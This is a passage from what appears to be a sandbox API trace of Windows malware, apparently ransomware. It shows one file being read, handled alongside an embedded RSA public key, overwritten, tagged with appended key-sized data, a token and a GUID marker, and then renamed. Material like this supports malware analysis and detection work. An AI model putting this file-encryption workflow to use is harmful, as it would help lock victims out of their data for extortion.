hTemplateFile=0x0) returned 0x664 [0169.344] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=43791) returned 1 [0169.344] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.347] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xaae9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.347] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.348] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.348] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.348] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0169.349] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xab0f, lpOverlapped=0x0) returned 1 [0169.349] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.349] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.349] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.349] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.349] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.350] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.350] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.350] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.350] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.351] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.351] GetLastError () returned 0x0 [0169.351] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.351] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.351] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.351] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.351] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.351] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.351] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.351] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0169.351] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.351] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xab10) returned 0x3b53ea8 [0169.351] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0169.352] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b5e9c0 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45428 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdc8 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b45470 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbde0 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe10 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe28 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0169.352] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b447b0 [0169.352] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe10 | out: hHeap=0xcd0000) returned 1 [0169.352] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe28 | out: hHeap=0xcd0000) returned 1 [0169.352] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.352] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0169.352] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe28 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.352] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fbe10 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0xd57fe0 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a70 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe28 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe10 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0169.353] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0169.353] GetCurrentThreadId () returned 0x324 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0xd32000 [0169.353] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.354] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.354] GetCurrentThreadId () returned 0x324 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.354] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0xd23a00 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.354] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0169.354] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0169.354] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0169.354] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cc38 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35f7c30 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0169.354] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0169.354] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbe10 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe28 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a50 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbdf8 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2c0 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe40 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0169.355] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0169.355] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe10 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbe10 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b447b0 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b449c0 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0xdc53e8 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe10 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b44bd8 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0169.356] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b5ebb8 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2f030 | out: hHeap=0xcd0000) returned 1 [0169.356] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ebb8 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b449c0 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44bd8 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe40 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbe28 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbdf8 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbde0 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b45470 | out: hHeap=0xcd0000) returned 1 [0169.357] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cc38 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5e9c0 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0169.358] WriteFile (in: hFile=0x664, lpBuffer=0x3b53ea8*, nNumberOfBytesToWrite=0xab0a, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b53ea8*, lpNumberOfBytesWritten=0x401fb14*=0xab0a, lpOverlapped=0x0) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b53ea8 | out: hHeap=0xcd0000) returned 1 [0169.358] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xab0f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.358] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.358] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0169.358] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.359] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b447b0 [0169.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b447b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0169.359] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48820 [0169.359] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b447b0 | out: hHeap=0xcd0000) returned 1 [0169.359] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71a00 | out: hHeap=0xcd0000) returned 1 [0169.359] WriteFile (in: hFile=0x664, lpBuffer=0x3b48820*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b48820*, lpNumberOfBytesWritten=0x401fb50*=0x28, lpOverlapped=0x0) returned 1 [0169.359] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0169.359] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.359] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.359] CloseHandle (hObject=0x664) returned 1 [0169.360] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.361] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x880) returned 0x3b48820 [0169.361] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2b10 | out: hHeap=0xcd0000) returned 1 [0169.361] MoveFileW 